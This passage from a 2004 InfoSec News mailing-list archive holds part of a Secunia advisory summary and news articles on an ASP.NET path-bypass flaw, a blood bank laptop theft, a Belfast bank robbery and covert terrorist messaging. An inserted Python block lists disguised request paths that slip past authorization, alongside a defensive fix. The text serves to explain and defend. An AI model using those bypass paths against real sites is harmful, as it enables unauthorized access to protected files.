Full Advisory: http://secunia.com/advisories/13449/

--
[SA13439] Gentoo update for file
Critical: Moderately critical
Where: From remote
Impact: System access
Released: 2004-12-14
Gentoo has issued an update for file. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a user's system.
Full Advisory: http://secunia.com/advisories/13439/

--
[SA13436] Sun Solaris Sendmail DNS TXT Records Buffer Overflow
Critical: Moderately critical
Where: From remote
Impact: DoS, System access
Released: 2004-12-14
An old vulnerability has been reported in sendmail included in Solaris 9, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/13436/

--
[SA13428] Gentoo update for phprojekt
Critical: Moderately critical
Where: From remote
Impact: Security Bypass
Released: 2004-12-13
Gentoo has issued an update for phprojekt. This fixes a vulnerability, which can be exploited by malicious people to bypass certain security restrictions.
Full Advisory: http://secunia.com/advisories/13428/

--
[SA13418] OmniWeb Window Injection Vulnerability
Critical: Moderately critical
Where: From remote
Impact: Spoofing
Released: 2004-12-10
Secunia Research has reported a vulnerability in OmniWeb, which can be exploited by malicious people to spoof the content of websites.
Full Advisory: http://secunia.com/advisories/13418/

--
[SA13412] iCab Window Injection Vulnerability
Critical: Moderately critical
Where: From remote
Impact: Spoofing
Released: 2004-12-10
Secunia Research has reported a vulnerability in iCab, which can be exploited by malicious people to spoof the content of websites.
Full Advisory: http://secunia.com/advisories/13412/

--
[SA13459] Gentoo update for nfs-utils
Critical: Moderately critical
Where: From local network
Impact: DoS, System access
Released: 2004-12-14
Gentoo has issued an update for nfs-utils. This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/13459/

--
[SA13458] Red Hat update for itanium kernel
Critical: Moderately critical
Where: From local network
Impact: Exposure of system information, Exposure of sensitive information, Privilege escalation, DoS, System access
Released: 2004-12-14
Red Hat has issued an update for the itanium kernel. This fixes multiple vulnerabilities, which can be exploited to gain escalated privileges, cause a DoS (Denial of Service), gain knowledge of sensitive information, or potentially compromise a system.
Full Advisory: http://secunia.com/advisories/13458/

--
[SA13457] Red Hat update for kernel
Critical: Moderately critical
Where: From local network
Impact: Exposure of sensitive information, Privilege escalation, DoS, System access
Released: 2004-12-14
Red Hat has issued an update for the kernel. This fixes multiple vulnerabilities, which can be exploited to gain escalated privileges, gain knowledge of sensitive information, cause a DoS (Denial of Service), or potentially compromise a system.
Full Advisory: http://secunia.com/advisories/13457/

--
[SA13440] nfs-utils "getquotainfo()" Buffer Overflow Vulnerability
Critical: Moderately critical
Where: From local network
Impact: System access
Released: 2004-12-14
Arjan van de Ven has reported a vulnerability in nfs-utils, which potentially can be exploited by malicious people to compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/13440/

--
[SA13429] SGI IRIX update for samba
Critical: Moderately critical
Where: From local network
Impact: DoS, System access
Released: 2004-12-13
SGI has issued an update for samba. This fixes multiple vulnerabilities, which can be exploited to cause a DoS (Denial of Service) or compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/13429/

--
[SA13455] Red Hat update for apache/mod_ssl
Critical: Less critical
Where: From remote
Impact: Security Bypass, Spoofing, Privilege escalation
Released: 2004-12-14
Red Hat has issued updates for apache and mod_ssl. These fix multiple vulnerabilities, which can be exploited to gain escalated privileges, gain unauthorised access to other web sites, or bypass certain security restrictions.
Full Advisory: http://secunia.com/advisories/13455/

--
[SA13454] Red Hat update for ruby
Critical: Less critical
Where: From remote
Impact: DoS
Released: 2004-12-14
Red Hat has issued an update for ruby. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service).
Full Advisory: http://secunia.com/advisories/13454/

--
[SA13447] Opera Default Application "kfmclient exec" Security Issue
Critical: Less critical
Where: From remote
Impact: System access
Released: 2004-12-15
Giovanni Delvecchio has discovered a security issue in Opera, which can be exploited by malicious people to compromise a user's system.
Full Advisory: http://secunia.com/advisories/13447/

--
[SA13437] Sun Java System Web Server / Application Server Session ID Disclosure
Critical: Less critical
Where: From remote
Impact: Exposure of sensitive information
Released: 2004-12-14
A vulnerability has been reported in Sun Java System Web Server and Application Server, which can be exploited by malicious people to gain knowledge of sensitive information.
Full Advisory: http://secunia.com/advisories/13437/

--
[SA13432] mnoGoSearch Cross-Site Scripting Vulnerabilities
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2004-12-13
Michael Krax and Mark J. Cox have reported some vulnerabilities in mnoGoSearch, which can be exploited by malicious people to conduct cross-site scripting attacks.
Full Advisory: http://secunia.com/advisories/13432/

--
[SA13469] Linux Kernel IGMP and "__scm_send()" Vulnerabilities
Critical: Less critical
Where: From local network
Impact: Exposure of sensitive information, Privilege escalation, DoS
Released: 2004-12-15
Paul Starzetz has reported some vulnerabilities in the Linux Kernel, which can be exploited by malicious people to cause a DoS (Denial of Service), and by malicious, local users to cause a DoS, gain knowledge of sensitive information, or potentially gain escalated privileges.
Full Advisory: http://secunia.com/advisories/13469/

--
[SA13473] Debian update for atari800
Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2004-12-15
Debian has issued an update for atari800. This fixes multiple vulnerabilities, which can be exploited by malicious, local users to escalate their privileges on a vulnerable system.
Full Advisory: http://secunia.com/advisories/13473/

--
[SA13442] Mandrake update for postgresql
Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2004-12-14
MandrakeSoft has issued an update for postgresql. This fixes a vulnerability, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges.
Full Advisory: http://secunia.com/advisories/13442/

--
[SA13430] mtr "mtr_curses_keyaction()" Function Buffer Overflow Vulnerability
Critical: Less critical
Where: Local system
Impact: Privilege escalation
Released: 2004-12-14
Przemysław Frasunek has reported a vulnerability in mtr, which potentially can be exploited by malicious, local users to perform certain actions with escalated privileges.
Full Advisory: http://secunia.com/advisories/13430/

--
[SA13410] Linux Kernel "sys32_ni_syscall" and "sys32_vm86_warning" Buffer Overflows
Critical: Less critical
Where: Local system
Impact: Unknown
Released: 2004-12-09
Jeremy Fitzhardinge has reported some potential vulnerabilities with an unknown impact in the Linux Kernel.
Full Advisory: http://secunia.com/advisories/13410/

--
[SA13480] Gentoo update for ncpfs
Critical: Not critical
Where: Local system
Impact: DoS
Released: 2004-12-15
Gentoo has issued an update for ncpfs. This fixes a potential vulnerability, which can be exploited by malicious, local users.
Full Advisory: http://secunia.com/advisories/13480/

--
[SA13444] Mandrake update for iproute2
Critical: Not critical
Where: Local system
Impact: DoS
Released: 2004-12-14
MandrakeSoft has issued an update for iproute2. This fixes a vulnerability, which can be exploited by malicious, local users to cause a DoS (Denial of Service).
Full Advisory: http://secunia.com/advisories/13444/

--
[SA13443] OpenBSD isakmpd Denial of Service Vulnerability
Critical: Not critical
Where: Local system
Impact: DoS
Released: 2004-12-15
A vulnerability has been reported in OpenBSD, which can be exploited by malicious, local users to cause a DoS (Denial of Service).
Full Advisory: http://secunia.com/advisories/13443/

Other:
--
[SA13434] Novell Netware "nlm" Screensaver Password Bypass Vulnerability
Critical: Less critical
Where: Local system
Impact: Security Bypass
Released: 2004-12-14
Novacoast has reported a vulnerability in Novell Netware, which can be exploited by a malicious person with physical access to a system to bypass the password protected screensaver.
Full Advisory: http://secunia.com/advisories/13434/

Cross Platform:
--
[SA13479] GNUBoard "doc" Parameter Arbitrary File Inclusion Vulnerability
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2004-12-15
Jeremy Bae has reported a vulnerability in GNUBoard, which can be exploited by malicious people to compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/13479/

--
[SA13478] MoniWiki Multiple File Extensions Script Upload Vulnerability
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2004-12-15
Jeremy Bae has reported a vulnerability in MoniWiki, which potentially can be exploited by malicious people to compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/13478/

--
[SA13471] Adobe Reader / Adobe Acrobat Multiple Vulnerabilities
Critical: Highly critical
Where: From remote
Impact: Exposure of sensitive information, System access
Released: 2004-12-15
Some vulnerabilities have been reported in Adobe Reader and Adobe Acrobat, which can be exploited by malicious people to disclose sensitive information or compromise a user's system.
Full Advisory: http://secunia.com/advisories/13471/

--
[SA13468] Ethereal Multiple Vulnerabilities
Critical: Highly critical
Where: From remote
Impact: DoS, System access
Released: 2004-12-15
Multiple vulnerabilities have been reported in Ethereal, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/13468/

--
[SA13448] NetMail IMAPD Unspecified Buffer Overflow Vulnerability
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2004-12-15
A vulnerability has been reported in NetMail, which can be exploited by malicious people to compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/13448/

--
[SA13424] phpMyAdmin Two Vulnerabilities
Critical: Highly critical
Where: From remote
Impact: Exposure of sensitive information, System access
Released: 2004-12-14
Nicolas Gregoire has reported two vulnerabilities in phpMyAdmin, which can be exploited by malicious people to compromise a vulnerable system and by malicious users to disclose sensitive information.
Full Advisory: http://secunia.com/advisories/13424/

--
[SA13421] phpBB Attachment Mod Two Vulnerabilities
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2004-12-13
Two vulnerabilities have been reported in the Attachment Mod module for phpBB, which can be exploited by malicious people to compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/13421/

--
[SA13419] MediaWiki "images" Arbitrary Script Upload and Execution Vulnerability
Critical: Highly critical
Where: From remote
Impact: System access
Released: 2004-12-13
A vulnerability has been reported in MediaWiki, which can be exploited by malicious people to compromise a vulnerable system.
Full Advisory: http://secunia.com/advisories/13419/

--
[SA13467] phpGroupWare Cross-Site Scripting and SQL Injection Vulnerabilities
Critical: Moderately critical
Where: From remote
Impact: Cross Site Scripting, Manipulation of data, Exposure of system information
Released: 2004-12-15
James Bercegay has reported some vulnerabilities in phpGroupWare, which can be exploited by malicious people to conduct cross-site scripting and SQL injection attacks.
Full Advisory: http://secunia.com/advisories/13467/

--
[SA13451] Sugar Sales Arbitrary Local File Inclusion Vulnerabilities
Critical: Moderately critical
Where: From remote
Impact: Exposure of system information, Exposure of sensitive information
Released: 2004-12-14
Daniel Fabian has reported some vulnerabilities in Sugar Sales, which can be exploited by malicious people to disclose sensitive information.
Full Advisory: http://secunia.com/advisories/13451/

--
[SA13446] Lithtech Engine UDP Datagram Denial of Service Vulnerability
Critical: Moderately critical
Where: From remote
Impact: DoS
Released: 2004-12-14
Luigi Auriemma has reported a vulnerability in Lithtech Engine, which can be exploited by malicious people to cause a DoS (Denial of Service).
Full Advisory: http://secunia.com/advisories/13446/

--
[SA13431] SQLgrey Postfix greylisting service Unspecified SQL Injection
Critical: Moderately critical
Where: From remote
Impact: Manipulation of data
Released: 2004-12-13
A vulnerability has been reported in SQLgrey Postfix greylisting service, which can be exploited by malicious people to conduct SQL injection attacks.
Full Advisory: http://secunia.com/advisories/13431/

--
[SA13422] PhpDig Unspecified Vulnerability
Critical: Moderately critical
Where: From remote
Impact: Unknown
Released: 2004-12-13
A vulnerability with an unknown impact has been reported in PhpDig.
Full Advisory: http://secunia.com/advisories/13422/

--
[SA13420] PHP Live! Unspecified Vulnerability
Critical: Moderately critical
Where: From remote
Impact: Unknown
Released: 2004-12-13
A vulnerability with an unknown impact has been reported in PHP Live!.
Full Advisory: http://secunia.com/advisories/13420/

--
[SA13413] IlohaMail Unspecified Vulnerability
Critical: Moderately critical
Where: From remote
Impact: Unknown
Released: 2004-12-10
A vulnerability with an unknown impact has been reported in IlohaMail.
Full Advisory: http://secunia.com/advisories/13413/

--
[SA13452] UBB.threads "Cat" Cross-Site Scripting Vulnerabilities
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2004-12-14
gp has reported some vulnerabilities in UBB.threads, which can be exploited by malicious people to conduct cross-site scripting attacks.
Full Advisory: http://secunia.com/advisories/13452/

--
[SA13441] UseModWiki "wiki.pl" Cross-Site Scripting Vulnerability
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2004-12-14
Jeremy Bae has reported a vulnerability in UseModWiki, which can be exploited by malicious people to conduct cross-site scripting attacks.
Full Advisory: http://secunia.com/advisories/13441/

--
[SA13414] PHP Gift Registry "message" Cross-Site Scripting Vulnerabilities
Critical: Less critical
Where: From remote
Impact: Cross Site Scripting
Released: 2004-12-10
Some vulnerabilities have been reported in PHP Gift Registry, which can be exploited by malicious people to conduct cross-site scripting attacks.
Full Advisory: http://secunia.com/advisories/13414/

========================================================================

Secunia recommends that you verify all advisories you receive, by clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only use those supplied by the vendor.

Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/

Subscribe:
http://secunia.com/secunia_weekly_summary/

Contact details:
Web : http://secunia.com/
E-mail : support@secunia.com
Tel : +45 70 20 51 44
Fax : +45 70 20 51 45

========================================================================

From isn at c4i.org Wed Dec 22 02:34:48 2004
From: isn at c4i.org (InfoSec News)
Date: Wed Dec 22 03:40:44 2004
Subject: [ISN] Security holes that run deep
Message-ID:

http://www.theregister.co.uk/2004/12/21/simple_aspnet_security_hole/

By Mark Burnett
SecurityFocus
21st December 2004

A couple of months ago, Toby Beaumont reported an ASP.NET vulnerability that, depending on the server configuration, allowed anyone to completely bypass user authentication and access protected files. Microsoft quickly provided a fix and the issue passed without much fanfare, mostly because the flaw wasn't widely exploited, and consequently many people failed to recognize just how serious this attack vector could be.

For nearly a decade, as the freedom of the Internet gave way to anarchy, IIS was the target of countless file access and canonicalization exploits. But Microsoft responded with an aggressive overhaul that resulted in IIS 6, a Web server that is surprisingly secure, even with a default installation. In fact, they did such a great job that IIS security has since become a boring topic. Although ASP.NET has had some problems, it too has held up fairly well.

But this last flaw revealed that ASP.NET has the potential for serious vulnerabilities. It's not the vulnerability itself that concerned me, but what this vulnerability told us about the foundations of ASP.NET file access.

In a way, it reminds me of the USA PATRIOT Act, passed in response to the terrorist attacks of September 11th, 2001. Despite concerns over privacy and the potential for abuse, the new law has not personally affected anyone I know.
Nevertheless, it still troubles me, because it messes with fundamentals without anyone completely understanding the future impact of these changes. We really cannot anticipate what problems we might encounter, especially when this law is combined with other future laws. If you never mess with basic civil liberties in the first place, you never have to worry about these complexities in the future.

That is why this ASP.NET issue concerns me. This isn't politics, but I see basic rules broken that might lead to complex future issues.

Poor Posture

The specific flaw Beaumont found was deceptively simple: by using a backslash instead of a forward slash you could access secure ASP.NET resources that normally required authentication. So, if accessing www.example.net/secure/private.aspx is supposed to require authentication, anyone who wants to could still access the file by entering the URL as www.example.net/secure\private.aspx (or using %5C instead of the backslash in IE). Even if you set NTFS permissions to block anonymous users from accessing the file, ASP.NET still allowed access.

As simple as it was to exploit, the existence of the bug told us a lot about ASP.NET's basic security posture -- none of it good:

* ASP.NET was not always using NTFS permissions to enforce file access.
* You can fool ASP.NET by disguising the file path.
* ASP.NET did not properly filter URL requests.
* ASP.NET authentication fails open rather than failing closed.

It turns out that the problem was not with ASP.NET's authentication code, it was an authorization issue. Authentication validates a user's identity, but authorization is what determines if authentication needs to take place. On a typical website, some resources are available to everyone while other resources are only available to authenticated users.

The ASP.NET authorization code determines if the resource requires authentication or not by checking the configuration file of the current application, and looking for rules that match the requested URL. If the URL does not match any of those rules, it checks the configuration of the parent application for a match. If it still finds no match, it continues up to each parent application until it reaches the machine configuration. By default, the machine configuration allows anyone to access anything without authentication.

This means that if you can disguise a URL so that it doesn't match any rule, you will eventually end up at the default rule that says there is no need to authenticate you to access this file. In other words, if ASP.NET thinks everyone is authorized to access the file, it won't bother running its authentication code to see if a particular user is authorized to have access. ASP.NET opens the file with the security context of the ASP.NET machine account (ASPNET), unless you specifically configure the application to use impersonation. Therefore it completely bypasses any NTFS permissions you might have set on the file.

While there were certain limitations that prevented widespread exploitation of this particular vulnerability, the fact that it was even possible should have been an alarming announcement. The fact that they did not follow such basic best practices brings into question what other vulnerabilities might exist. Sure, there might never be another serious ASP.NET vulnerability; and if there are any, they might never be publicly known. But that really doesn't matter, because that's not the point. The point is that you must code defensively and follow best practices from the beginning even if there are no foreseeable weaknesses with your code.

I give the IIS and ASP.NET team much credit for what they have accomplished so far, but we are all facing a new standard.
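The rule walk the article describes, as an added example that is not from the article, from Microsoft or from ASP.NET itself: a small Python model of prefix-rule authorization, written in Python only because the check is language-neutral and easy to run. The rule table, the request paths and the function names (naive_authorize, canonicalize, hardened_authorize) are constructed for illustration; the real ASP.NET matcher is not this code. The first matcher compares the path as received and, when nothing matches, inherits the permissive machine-level default, so the backslash and %5C forms from the article slip past the rule for /secure/. Going one step beyond the article, the same matcher is also fooled by a dot-segment or a case change, because NTFS resolves both. The second matcher reduces the path to the single form the file handler will act on before consulting any rule, and treats "no rule matched" as a denial.

```python
from urllib.parse import unquote
import posixpath

# Constructed rule table modelled on the article's example site.
# Prefixes are canonical paths; the first matching rule wins.
RULES = [
    ("/secure/", "authenticated"),  # protected application
    ("/public/", "anyone"),         # explicitly public content
]

# The machine-level default the article describes: no match means "anyone".
MACHINE_DEFAULT = "anyone"


def naive_authorize(raw_path):
    """Flawed matcher: compares the request path exactly as received and
    falls through to the permissive machine default (fails open)."""
    for prefix, who in RULES:
        if raw_path.startswith(prefix):
            return who
    return MACHINE_DEFAULT


def canonicalize(raw_path):
    """Reduce a request path to the one form the file handler will act on.

    Decode once (exactly as many times as the handler decodes), fold the
    Windows separator to '/', lower-case for a case-insensitive file system,
    then resolve '.' and '..' segments and repeated slashes.
    """
    path = unquote(raw_path)                       # %5C -> '\'
    path = path.replace("\\", "/")                 # the article's backslash trick
    path = path.lower()                            # NTFS compares case-insensitively
    path = posixpath.normpath("/" + path.lstrip("/"))  # '/a/../b' -> '/b', '//x' -> '/x'
    return path


def hardened_authorize(raw_path):
    """Hardened matcher: canonicalize first, then fail closed."""
    path = canonicalize(raw_path)
    for prefix, who in RULES:
        if path == prefix.rstrip("/") or path.startswith(prefix):
            return who
    return "denied"  # no rule matched: deny instead of inheriting the permissive default


if __name__ == "__main__":
    # Constructed request paths: the legitimate URL, four disguised forms
    # of the same protected file, and a file no rule mentions.
    for p in ["/secure/private.aspx", "/secure\\private.aspx",
              "/secure%5Cprivate.aspx", "/public/../secure/private.aspx",
              "/Secure/Private.aspx", "/unlisted.aspx"]:
        print(f"{p:35} naive={naive_authorize(p):14} hardened={hardened_authorize(p)}")
```

The point of canonicalize() is that the authorization check and the file handler must see the same string; decoding a different number of times than the handler, or comparing before folding separators and case, recreates exactly the mismatch the article describes.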
I'd like to see them compile a list of specific best practices that they will never, ever break. Stuff like saying they will always filter URLs, or they will always fail closed. And then I'd like to see them publish this list to demonstrate their willingness to stick to these rules.

This obviously isn't just a Microsoft problem, we could all certainly learn from this lesson. But that doesn't mean Microsoft can't take the lead in tackling this problem. Whether you are talking about politics or programming, the concept is the same: follow best practices.

-=-

Mark Burnett is an independent security consultant and author who specializes in securing Windows-based servers. He is co-author of the best-selling book Stealing the Network (Syngress), and has also co-authored or contributed to several other books, including Special OPS: Host and Network Security for Microsoft, UNIX, and Oracle (Syngress); Maximum Windows Security (SAMS); and Dr. Tom Shinder's ISA Server and Beyond (Syngress).

From isn at c4i.org Wed Dec 22 02:35:08 2004
From: isn at c4i.org (InfoSec News)
Date: Wed Dec 22 03:40:47 2004
Subject: [ISN] Blood bank fears laptop heist ID theft
Message-ID:

http://news.com.com/Blood+bank+fears+laptop+heist+ID+theft/2100-1029_3-5500114.html

By Paul Festa
Staff Writer, CNET News.com
December 21, 2004

More than 100,000 people who donated to a California blood bank may have parted with more than plasma.

Delta Blood Bank sent a letter Friday to donors, warning them a computer that held their personal information had been stolen and advising them to take steps against identity theft and credit card fraud.

"On Dec. 10, 2004, a thief or thieves stole one of two computers available for donor registration at a mobile blood drive being conducted that day," Delta CEO Benjamin Spindler wrote in the letter. "This computer contained confidential information about you, including your name, address, date of birth and your Social Security number.
We deeply regret that this has happened." Identity theft has emerged as one of the thorniest problems of the Internet age, and the threat has turned some missing laptops into potentially catastrophic security breaches. Wells Fargo in October had to warn customers when for the third time in a year computers with sensitive information went missing. Since July of last year, California has required organizations to notify residents of the state "in the most expedient time possible and without unreasonable delay" if security breaches have exposed residents' personal information. The law applies to breaches of someone's name, plus a Social Security number, driver's license or California ID card number, a financial account number, or a credit or debit card number with a PIN or access code. Delta's lost laptop, a new Compaq, was stolen outside the St. Paul's Lutheran Church in Tracy, Calif., following a mobile blood bank collection there. Delta's director of human resources, John O'Neill, said two layers of security could still protect the personal information despite the computer's theft. The first is Microsoft's standard Windows password required to launch the operating system, and the second is the series of steps required to launch what O'Neill described as an "esoteric, unique" database, created by a software provider he declined to name. "Could a hacker get in there, or someone familiar with those applications?" O'Neill asked rhetorically. "Potentially they could. That's why we sent the letter." In addition to the letter, which urged donors to register fraud alerts with credit reporting agencies and check their credit ratings quarterly, Delta pledged new security procedures. The blood bank will no longer require Social Security numbers from its donors, and has revised procedures for handling computer hardware and other sensitive equipment. 
From isn at c4i.org Wed Dec 22 02:37:12 2004 From: isn at c4i.org (InfoSec News) Date: Wed Dec 22 03:40:48 2004 Subject: [ISN] Record $39M Robbed From N. Ireland Bank Message-ID: http://www.guardian.co.uk/worldlatest/story/0,1280,-4686550,00.html [This caught me as interesting for all the levels of security that had to be breached for this robbery to have taken place. - WK] December 21, 2004 BELFAST, Northern Ireland (AP) - In one of the world's biggest robberies, thieves took the families of two top bankers hostage and forced the bosses to help them steal more than $39 million from the vaults of a Belfast bank's main office, authorities said Tuesday. Experts said Monday's raid on the Northern Bank cash center was the biggest robbery since 1987, when thieves made off with about $65 million in cash and other valuables from the Knightsbridge Safe Deposit Center in west London. The tactics in Belfast - particularly the use of hostage-taking as a way to infiltrate a high-security target - suggested a level of sophistication and experience most commonly found within Northern Ireland's rival outlawed groups, particularly the Irish Republican Army. ``This isn't a gang of Belfast criminals who just got together. It's more than that. This looks like a military operation with obvious connotations,'' said John O'Connor, a former commander of Scotland Yard's elite detective unit in London. Assistant Chief Constable Sam Kinkaid, the police officer leading the investigation, said his detectives didn't yet know whether a particular group was responsible for what he called a ``clearly well organized'' raid. In the neighboring Irish Republic, Justice Minister Michael McDowell said peacemaking efforts could be hurt if police linked the raid to the IRA, which is known to have robbed banks in the past to finance operations. The IRA has observed a truce since 1997 but remains active, running criminal rackets such as smuggling fuel and cigarettes. 
Diplomatic efforts to revive a power-sharing government in Northern Ireland involving Sinn Fein, the IRA-linked party backed by most Roman Catholics, have repeatedly stumbled over other groups' demands that the IRA disarm and disband. Police didn't learn about the heist until three hours after the robbers had left in a truck filled with cash from underground vaults at the bank's downtown headquarters. Kinkaid said masked gunmen invaded the homes of two senior employees of Northern Bank late Sunday and warned that if the executives didn't cooperate or tried to raise an alarm, their families would be killed. The families were held at gunpoint at undisclosed locations outdoors where overnight temperatures were near freezing. About 6 p.m. Monday, Kinkaid said, the robbers began clearing out vaults packed with cash ready to be distributed to the bank's 95 branches and hundreds of automated teller machines across Northern Ireland. Both families ``suffered great trauma'' during their abduction but were released unharmed, except for one person who needed treatment for hypothermia, he said. Kinkaid said the bank hadn't been able to provide an exact figure for the amount stolen, partly because police shut down its offices for forensic examination, but he said it might exceed 20 million pounds, or about $39 million. Other security officials said the vaults held closer to $58 million because of the heavy cash needs of the Christmas holidays. The Guinness Book of World Records lists the theft of gold bullion from the central bank of Nazi Germany in 1944 and 1945 as the biggest of all time, valued in 1984 at $4 billion. The largest ``normal'' bank robbery is listed as the 1976 theft of $50 million in cash and deposit-box valuables from a Lebanese bank. O'Connor said the gang researched Northern Bank's security systems expertly. 
He said the two bank officials probably were targeted because there were ``two lots of combinations on the vault, so no one person has the knowledge.'' He said the gang must have had more than a dozen members, with at least four guarding each hostage family. Such a gang ``must be confident with each other that they're all staunch and they won't roll over in the event of being nicked (arrested),'' he said. The IRA previously gained access to high-security targets by taking the families of employees hostage, most infamously in October 1990, when it forced civilian employees of the police to drive car bombs to three British military installations. Six soldiers and a chef died in the remote-control blasts. Police say the IRA still uses hostage-taking in its criminal operations. They cite an incident in May when the IRA was accused of taking staff hostage at a retail superstore, then stealing more than $7.75 million in alcohol, appliances and other goods. From isn at c4i.org Wed Dec 22 02:37:34 2004 From: isn at c4i.org (InfoSec News) Date: Wed Dec 22 03:40:51 2004 Subject: [ISN] On the Open Internet, a Web of Dark Alleys Message-ID: http://www.nytimes.com/2004/12/20/technology/20covert.html By TOM ZELLER Jr. December 20, 2004 The indictment early this month of Mark Robert Walker by a federal grand jury in Texas might have seemed a coup for the government in its efforts to police terrorist communications online. Mr. Walker, a 19-year-old student, is accused, among other things, of using his roommate's computer to communicate with - and offer aid to - a federally designated terrorist group in Somalia and with helping to run a jihadist Web site. "I hate the U.S. government," is among the statements Mr. Walker is said to have posted online. "I wish I could have been flying one of the planes on Sept. 11." By international terror standards, it was an extremely low-level bust. But the case, which was supposedly broken only after Mr. 
Walker's roommate tipped off the police, highlights the near impossibility of tracking terrorist communications online. Even George J. Tenet, the former director of central intelligence, speaking on the vulnerabilities of the nation's computer networks at a technology security conference on Dec. 1, noted the ability of terrorists to "work anonymously and remotely to inflict enormous damage at little cost or risk to themselves." He called for a wholesale taming of cyberspace. "I know that these actions would be controversial in this age where we still think the Internet is a free and open society with no control or accountability," Mr. Tenet said, "But, ultimately, the Wild West must give way to governance and control." Even if the government is able to shore up its networks against attack - one of many goals set forth by the intelligence reform bill passed last week - the ability of terrorists and other dark elements to engage in covert communications online remains a daunting security problem, and one that may prove impossible to solve. Late last month, an Internet privacy watchdog group revealed that the Central Intelligence Agency had contributed money for a counterterrorism project that promised, among other things, an automated surveillance system to monitor conversations on Internet chat rooms. Developed by two computer scientists at Rensselaer Polytechnic Institute in Troy, N.Y., as part of a National Science Foundation program called Approaches to Combat Terrorism, the chat room project takes aim at the possibility that terrorists could communicate through crowded public chat channels, where the flurry of disconnected, scrolling messages makes it difficult to know who is talking to whom. The automated software would monitor both the content and timing of messages to help isolate and identify conversations. 
Putting privacy concerns aside, some Internet specialists wonder whether such projects, even if successful, fail to acknowledge the myriad other ways terrorists can plot and communicate online. From free e-mail accounts and unsecured wireless networks to online programs that can shield Internet addresses and hide data, the opportunities to communicate covertly are utterly available and seemingly endless. Even after the Sept. 11 attacks, "the mass media, policy makers, and even security agencies have tended to focus on the exaggerated threat of cyberterrorism and paid insufficient attention to the more routine uses made of the Internet," Gabriel Weimann, a professor of communication at Haifa University in Israel, wrote in a report for the United States Institute of Peace this year. "Those uses are numerous and, from the terrorists' perspective, invaluable." Todd M. Hinnen, a trial attorney with the United States Justice Department's computer crime division, wrote an article on terrorists' use of the Internet for Columbia Science and Technology Law Review earlier this year. "There's no panacea," Mr. Hinnen said in an interview. "There has always been the possibility of meeting in dark alleys, and that was hard for law enforcement to detect." Now, every computer terminal with an Internet connection has the potential to become a dark alley. Shortly after Sept. 11, questions swirled around steganography, the age-old technique of hiding one piece of information within another. A digital image of a sailboat, for instance, might also invisibly hold a communiqué, a map or some other hidden data. A digital song file might contain blueprints for a desired target. But the troubling truth is that terrorists rarely have to be technically savvy to cloak their conversations. Even simple, prearranged code words can do the job when the authorities do not know whose e-mail to monitor or which Web sites to watch. 
Interviews conducted by Al Jazeera, the Arab television network, with the terror suspects Khalid Shaikh Mohammed and Ramzi bin al-Shibh two years ago (both have since been arrested), suggested that the Sept. 11 attackers communicated openly using prearranged code words. The "faculty of urban planning," for instance, referred to the World Trade Center. The Pentagon was the "faculty of fine arts." Other reports have suggested that Mohammed Atta, suspected of being the leader of the Sept. 11 hijackers, transmitted a final cryptic message to his co-conspirators over the Internet: "The semester begins in three more weeks. We've obtained 19 confirmations for studies in the faculty of law, the faculty of urban planning, the faculty of fine arts, and the faculty of engineering." And increasingly, new tools used to hide messages can quickly be found with a simple Web search. Dozens of free or inexpensive steganography programs are available for download. And there is ample evidence that terrorists have made use of encryption technologies, which are difficult to break. The arrest in Pakistan in July of Muhammad Naeem Noor Khan, thought to be an Al Qaeda communications specialist, for instance, yielded a trove of ciphered messages from his computers. Still, the mere act of encrypting a message could draw attention, so numerous software programs have been developed to hide messages in other ways. At one Web site, spammimic.com, a user can type in a phrase like "Meet me at Joe's" and have that message automatically converted into a lengthy bit of prose that reads like a spam message: "Dear Decision maker; Your e-mail address has been submitted to us indicating your interest in our briefing! This is a one-time mailing there is no need to request removal if you won't want any more," and so forth. The prose is then pasted into an e-mail message and sent. A recipient expecting the fake spam message can then paste it into the site's decoder and read the original message. 
Another free program will convert short messages into fake dialogue for a play. And still simpler schemes require no special software at all - or even the need to send anything. In one plan envisioned by Mr. Hinnen in his law review article, a group need only provide the same user name and password to all of its members, granting them all access to a single Web-based e-mail account. One member simply logs on and writes, but does not send, an e-mail message. Later, a co-conspirator, perhaps on the other side of the globe, logs on, reads the unsent message and then deletes it. "Because the draft was never sent," Mr. Hinnen wrote, the Internet service provider "does not retain a copy of it and there is no record of it traversing the Internet - it never went anywhere." The message would be essentially untraceable. Michael Caloyannides, a computer forensics specialist and a senior fellow at Mitretek Systems, a nonprofit scientific research organization based in Falls Church, Va., said the nature of a networked universe made it possible for just about anyone to communicate secretly. Conspirators do not even need to rely on code-hiding programs, because even automated teller machines can be used to send signals, Dr. Caloyannides explained. A simple withdrawal of $20 from an account in New York might serve as an instant message to an accomplice monitoring the account electronically from halfway around the world, for example. Dr. Caloyannides, who will conduct a workshop next May for government officials and others trying to track terrorist communications, also pointed to hundreds of digitally encrypted messages daily on public Usenet newsgroups. The messages often come from faked e-mail accounts; the intended recipients are often unknown. But a covert correspondent expecting a secret communiqué at a particular newsgroup need only download a batch of messages and then use an encryption key on one with some prearranged subject line, "like 'chocolate cake,' " Dr. 
